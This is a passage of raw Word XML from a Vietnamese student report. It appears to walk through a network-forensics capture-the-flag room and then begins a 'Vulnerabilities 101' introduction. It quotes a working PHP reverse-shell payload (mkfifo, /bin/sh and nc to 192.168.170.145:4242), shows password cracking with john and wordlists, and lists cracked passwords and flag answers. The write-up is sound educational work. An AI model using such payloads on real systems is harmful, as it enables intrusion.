                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="5384800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5555F84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3: Mở gói tin http /developer/upload.php để xem được các thông tin về reverse shell. “/developer/” là câu trả lời cho câu hỏi đầu tiên của Tast 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E22092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5C588CFF" wp14:editId="4C260A86">
            <wp:extent cx="5731510" cy="435610"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="435610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC58C0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4: Tìm payload.php để lấy được payload dùng để lấy quyền truy cập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6799121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6A6E8221" wp14:editId="2C8328D2">
            <wp:extent cx="5731200" cy="4000500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4000500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76574B9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huỗi payload” &lt;?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 192.168.170.145 4242 &gt;/tmp/f")?&gt;” là câu trả lời cho câu hỏi thứ 2 của Task 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFB3D1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3EC1CB4B" wp14:editId="2BA0CF45">
            <wp:extent cx="5731510" cy="446405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="446405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A636A6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5: Lấy mật khẩu để tấn công privesc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F5E375"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 Ta tiến hành xem các gói tin tcp để tìm password truy cập </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E23EB07"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533C476F" wp14:editId="4A8D3E19">
            <wp:extent cx="5731200" cy="2692400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2692400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FC382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27941794" wp14:editId="77596214">
            <wp:extent cx="5731200" cy="3975100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3975100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2101C92B"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áp án cho câu hỏi 3 của Task 1 là “whenevernoteartinstant”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F2A2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3B1486E3" wp14:editId="1D87826A">
            <wp:extent cx="5731510" cy="432435"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32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1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="432435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B51C9A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Ở file trên ta có thể thấy được một command “git clone” đây chính là câu lệnh mà kẻ tấn công thiết lập để tấn công lâu dài vào các gói tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB0F1B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72A2EF13" wp14:editId="6FBAB28C">
            <wp:extent cx="5731510" cy="458470"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32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2"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="458470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E34E2CD"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68608E6E" wp14:editId="5B450F9D">
            <wp:extent cx="5731200" cy="3975100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32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43"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3975100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEDA19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Ở phía trên ta có thể thấy một số tài khoản có các mật khẩu đã được hash, để giải mã các mã hash này chúng ta sẽ sử dụng một wordlist có tên là fastrack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505D3D3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ầu tiên chúng ta tiến hành lưu các tài khoản này dưới dạng file hash.txt, sau đó sử dụng command john –wordlist = fasttrack.txt hash.txt để tiến hành giải mã. Dưới đây là 4 mật khẩu đã giải mã được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2402C16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0374EB55" wp14:editId="3774C192">
            <wp:extent cx="5731200" cy="1282700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="1282700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C22C0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1532BF88" wp14:editId="56EA6E71">
            <wp:extent cx="5731510" cy="464185"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31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5"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="464185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C20482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7A9BBB11" wp14:editId="43646919">
            <wp:extent cx="5731200" cy="2679700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32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46"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2679700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7C2BA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 xml:space="preserve">Đồng thời ở đây cũng chứa mã hash mà kẻ tấn công sử dụng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA35D5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7E20A989" wp14:editId="4614FB95">
            <wp:extent cx="5731200" cy="2679700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31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46"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2679700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0940AAE0"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2E046510" wp14:editId="79A5D9CC">
            <wp:extent cx="5731510" cy="448945"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="448945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E805C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6: Truy cập vào link chứa code backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30336CA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6AA14FC8" wp14:editId="497EA26B">
            <wp:extent cx="5731200" cy="2451100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2451100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD159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1A29B8E4" wp14:editId="4DA6CA62">
            <wp:extent cx="5731200" cy="2451100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31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9"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2451100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F914B0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Ở hàm main go chúng ta có thể thấy được hash mặt định cho backdoor, hashcode salt cho backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F7D58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12AEFD5A" wp14:editId="5E3A20D0">
            <wp:extent cx="5731510" cy="923290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="923290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C6BC2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7: Crack mã hash để lấy mật khẩu backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642C515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húng ta tiến hành lưu chuỗi hash mà atacker sử dụng và hashcode salt trong file hash.txt. Sau đó chúng ta tiến hành tìm định dạng hash và tiến hành giải mã bằng wordlist rockyou.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133A8E71"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7709B176" wp14:editId="49E9FD45">
            <wp:extent cx="5731200" cy="812800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34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1"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="812800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4877523A"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30A60E38" wp14:editId="6D7C3F20">
            <wp:extent cx="5731200" cy="381000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34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2"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="381000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="249A585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528EA516" wp14:editId="45601D93">
            <wp:extent cx="5731200" cy="3149600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34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3"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3149600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="503C7A5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Mật khẩu thu được là “november16”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2F43C9"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135B6F6A" wp14:editId="35CDF546">
            <wp:extent cx="5731510" cy="504825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33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4"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="504825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="350412E5" w14:textId="047318C2" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA" w:rsidP="00C97D8D">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Bước 8: tấn công ssh vào trang web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7855B26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Chúng ta tiến hành tấn công ssh vào trang web bằng câu lệnh: ssh [địa chỉ ip] -p [port]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAA2A1C"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39474803" wp14:editId="7EA25CCC">
            <wp:extent cx="5731200" cy="2451100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33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55"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2451100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1E1E0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35CF09C7" wp14:editId="62B6E0F2">
            <wp:extent cx="5731510" cy="799465"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="799465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4773ED8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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1CE092F6" wp14:editId="6E72A22F">
            <wp:extent cx="5731200" cy="2108200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2108200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="456C4A34"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a nhập mật khẩu là “november16” để truy cập vào địa chỉ ip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666797E3"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3EC4D578" wp14:editId="203E21C1">
            <wp:extent cx="5731200" cy="520700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33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58"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="520700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3AC7FE"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Từ đây ta tiến hành truy cập vào thư mục james để lấy được flag của user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D171DA8"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0AA1B5B2" wp14:editId="78C41333">
            <wp:extent cx="5731200" cy="508000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32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59"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="508000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD9B3AF"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Để lấy được flag của root ta tiến hành truy cập backdoor dưới quyền root, rồi tìm đến file root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCF31F2"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114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="15218BCF" wp14:editId="42FD367A">
            <wp:extent cx="5731200" cy="1612900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="44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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="1612900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BBBDA6" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="071FBB98" wp14:editId="676C5E74">
            <wp:extent cx="5731510" cy="799465"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="799465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54674DA3" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc90050801"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>3.7. Vulnerabilities 101</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w14:paraId="1A1A593B" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc90050802"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.7.1. Khái niệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w14:paraId="7FDDFF4D" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">An ninh mạng là một lĩnh vực kinh doanh lớn trong thế giới hiện đại. Các vụ hack mà chúng ta nghe trên báo là từ việc khai thác các lỗ hổng. Trong phòng này, chúng tôi sẽ giải thích chính xác lỗ hổng là gì, các loại lỗ hổng và </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>cách chúng tôi có thể khai thác những lỗ hổng này để thành công trong nỗ lực thử nghiệm thâm nhập của chúng tôi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02982922" w14:textId="18893F88" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Một phần quan trọng của thử nghiệm thâm nhập là biết các kỹ năng và nguồn lực cho bất kỳ tình huống nào </w:t>
      </w:r>
      <w:r w:rsidR="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> phải đối mặt. Phòng này sẽ giới thiệu cho </w:t>
      </w:r>
      <w:r w:rsidR="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> một số tài nguyên cần thiết khi nghiên cứu các lỗ hổng bảo mật, cụ thể là </w:t>
      </w:r>
      <w:r w:rsidR="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ta</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
